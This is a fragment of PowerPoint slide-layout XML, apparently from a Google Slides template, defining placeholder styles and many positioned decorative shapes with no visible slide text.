  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'0'3'0,"4"2"0,4-1 0,0 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658D5F-65FB-4E17-9D5B-8CF1DE5A98DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/3/2024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49544B-F866-4ED0-8997-24601187AE87}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1595199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263717A-E3C1-4BED-ABE0-B7069385E023}"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66646" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3FE6F5B0-BCF1-4291-802C-4ED5F9057036}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82117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17696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9590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92"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4281247" y="2215683"/>
            <a:ext cx="7068800" cy="1546400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4281180" y="3818903"/>
            <a:ext cx="7068800" cy="1046400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5882774" y="6215517"/>
            <a:ext cx="600733" cy="744979"/>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6" name="Google Shape;196;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5291768" y="5333718"/>
            <a:ext cx="591013" cy="672893"/>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7" name="Google Shape;197;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8377819" y="5612687"/>
            <a:ext cx="280284" cy="611852"/>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8" name="Google Shape;198;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7662081" y="5390448"/>
            <a:ext cx="552209" cy="677016"/>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9" name="Google Shape;199;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9418147" y="5509371"/>
            <a:ext cx="609091" cy="567451"/>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0" name="Google Shape;200;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11657298" y="5555569"/>
            <a:ext cx="660375" cy="453651"/>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1" name="Google Shape;201;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8775356" y="5388321"/>
            <a:ext cx="496691" cy="513331"/>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2" name="Google Shape;202;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8676176" y="6045283"/>
            <a:ext cx="695056" cy="718656"/>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3" name="Google Shape;203;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7334739" y="6076801"/>
            <a:ext cx="672893" cy="534169"/>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4" name="Google Shape;204;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6935423" y="5434132"/>
            <a:ext cx="627093" cy="589613"/>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5" name="Google Shape;205;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6354112" y="5434125"/>
            <a:ext cx="452803" cy="534156"/>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6" name="Google Shape;206;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7362478" y="6664025"/>
            <a:ext cx="617412" cy="237283"/>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7" name="Google Shape;207;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10736763" y="6433681"/>
            <a:ext cx="786656" cy="552172"/>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8" name="Google Shape;208;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10736769" y="5372369"/>
            <a:ext cx="517491" cy="545251"/>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9" name="Google Shape;209;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9312764" y="6600511"/>
            <a:ext cx="396808" cy="28164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0" name="Google Shape;210;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11666301" y="6600167"/>
            <a:ext cx="384327" cy="245603"/>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1" name="Google Shape;211;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8214287" y="6373645"/>
            <a:ext cx="431488" cy="428728"/>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2" name="Google Shape;212;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11363259" y="5333706"/>
            <a:ext cx="409288" cy="513369"/>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3" name="Google Shape;213;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6522965" y="6070569"/>
            <a:ext cx="554971" cy="546651"/>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4" name="Google Shape;214;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11772537" y="6111825"/>
            <a:ext cx="521651" cy="385727"/>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5" name="Google Shape;215;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5985573" y="5608925"/>
            <a:ext cx="240044" cy="498052"/>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6" name="Google Shape;216;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1920548">
            <a:off x="9648968" y="6210900"/>
            <a:ext cx="668696" cy="567409"/>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7" name="Google Shape;217;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11017723" y="6023741"/>
            <a:ext cx="639575" cy="452289"/>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8" name="Google Shape;218;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="10245807" y="5309640"/>
            <a:ext cx="373208" cy="477288"/>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9" name="Google Shape;219;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10212864" y="5826928"/>
            <a:ext cx="503611" cy="568851"/>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0" name="Google Shape;220;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6746084" y="6610610"/>
            <a:ext cx="514731" cy="344087"/>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1" name="Google Shape;221;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10376560" y="6513509"/>
            <a:ext cx="233123" cy="249763"/>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2" name="Google Shape;222;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1977021" y="5612687"/>
            <a:ext cx="280284" cy="611852"/>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3" name="Google Shape;223;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261281" y="5390448"/>
            <a:ext cx="552209" cy="677016"/>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4" name="Google Shape;224;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3017347" y="5509371"/>
            <a:ext cx="609091" cy="567451"/>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5" name="Google Shape;225;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2374556" y="5388321"/>
            <a:ext cx="496691" cy="513331"/>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6" name="Google Shape;226;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2275376" y="6045283"/>
            <a:ext cx="695056" cy="718656"/>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7" name="Google Shape;227;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="933939" y="6076801"/>
            <a:ext cx="672893" cy="534169"/>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8" name="Google Shape;228;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534623" y="5434132"/>
            <a:ext cx="627093" cy="589613"/>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9" name="Google Shape;229;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-46688" y="5434125"/>
            <a:ext cx="452803" cy="534156"/>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0" name="Google Shape;230;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="961678" y="6664025"/>
            <a:ext cx="617412" cy="237283"/>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1" name="Google Shape;231;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4335963" y="6433681"/>
            <a:ext cx="786656" cy="552172"/>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2" name="Google Shape;232;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4335971" y="5372369"/>
            <a:ext cx="517491" cy="545251"/>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3" name="Google Shape;233;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2911965" y="6600511"/>
            <a:ext cx="396808" cy="28164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4" name="Google Shape;234;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5265501" y="6600167"/>
            <a:ext cx="384327" cy="245603"/>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5" name="Google Shape;235;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1813487" y="6373645"/>
            <a:ext cx="431488" cy="428728"/>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6" name="Google Shape;236;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4962459" y="5333706"/>
            <a:ext cx="409288" cy="513369"/>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7" name="Google Shape;237;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122165" y="6070569"/>
            <a:ext cx="554971" cy="546651"/>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8" name="Google Shape;238;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371737" y="6111825"/>
            <a:ext cx="521651" cy="385727"/>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9" name="Google Shape;239;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3606" y="6533642"/>
            <a:ext cx="240044" cy="498052"/>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0" name="Google Shape;240;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1920548">
            <a:off x="3248167" y="6210900"/>
            <a:ext cx="668696" cy="567409"/>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1" name="Google Shape;241;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4616923" y="6023741"/>
            <a:ext cx="639575" cy="452289"/>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2" name="Google Shape;242;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="3845007" y="5309640"/>
            <a:ext cx="373208" cy="477288"/>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3" name="Google Shape;243;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3812064" y="5826928"/>
            <a:ext cx="503611" cy="568851"/>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4" name="Google Shape;244;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345284" y="6610610"/>
            <a:ext cx="514731" cy="344087"/>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5" name="Google Shape;245;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3975760" y="6513509"/>
            <a:ext cx="233123" cy="249763"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2252348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90"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="997233" y="300033"/>
            <a:ext cx="8187200" cy="11432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92" name="Google Shape;292;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="997233" y="1737116"/>
            <a:ext cx="8187200" cy="4814400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="609585" lvl="0" indent="-516454">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2500"/>
              <a:buChar char="✘"/>
              <a:defRPr sz="3333"/>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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="293" name="Google Shape;293;p5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9923870" y="-121539"/>
            <a:ext cx="2395052" cy="7107432"/>
            <a:chOff x="6023725" y="842300"/>
            <a:chExt cx="1358150" cy="4030375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="294" name="Google Shape;294;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6371275" y="842300"/>
              <a:ext cx="397100" cy="492450"/>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5" name="Google Shape;295;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6991200" y="2879025"/>
              <a:ext cx="390675" cy="44480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6" name="Google Shape;296;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6244725" y="2547975"/>
              <a:ext cx="185275" cy="404450"/>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7" name="Google Shape;297;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6823375" y="1978500"/>
              <a:ext cx="365025" cy="447525"/>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8" name="Google Shape;298;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6071400" y="1791425"/>
              <a:ext cx="402625" cy="375100"/>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9" name="Google Shape;299;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6902250" y="3951050"/>
              <a:ext cx="436525" cy="299875"/>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0" name="Google Shape;300;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6405225" y="2154575"/>
              <a:ext cx="328325" cy="339325"/>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1" name="Google Shape;301;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6537275" y="2750650"/>
              <a:ext cx="459450" cy="475050"/>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2" name="Google Shape;302;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6855475" y="1544725"/>
              <a:ext cx="444800" cy="3531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3" name="Google Shape;303;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6844475" y="1037625"/>
              <a:ext cx="414525" cy="38975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4" name="Google Shape;304;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6553775" y="1840025"/>
              <a:ext cx="234775" cy="276975"/>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5" name="Google Shape;305;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6618875" y="2550725"/>
              <a:ext cx="408125" cy="156850"/>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6" name="Google Shape;306;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6336425" y="4507675"/>
              <a:ext cx="520000" cy="36500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7" name="Google Shape;307;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6425400" y="3728200"/>
              <a:ext cx="342075" cy="360425"/>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8" name="Google Shape;308;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6789450" y="3384325"/>
              <a:ext cx="262300" cy="18617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9" name="Google Shape;309;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6950850" y="4617725"/>
              <a:ext cx="254050" cy="162350"/>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0" name="Google Shape;310;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6051225" y="1090800"/>
              <a:ext cx="285225" cy="283400"/>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1" name="Google Shape;311;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6849975" y="3631900"/>
              <a:ext cx="270550" cy="339350"/>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2" name="Google Shape;312;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6351100" y="3281600"/>
              <a:ext cx="366850" cy="361350"/>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3" name="Google Shape;313;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6316250" y="3040425"/>
              <a:ext cx="137600" cy="122000"/>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4" name="Google Shape;314;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6879325" y="4294925"/>
              <a:ext cx="344825" cy="25497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5" name="Google Shape;315;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6114500" y="2324225"/>
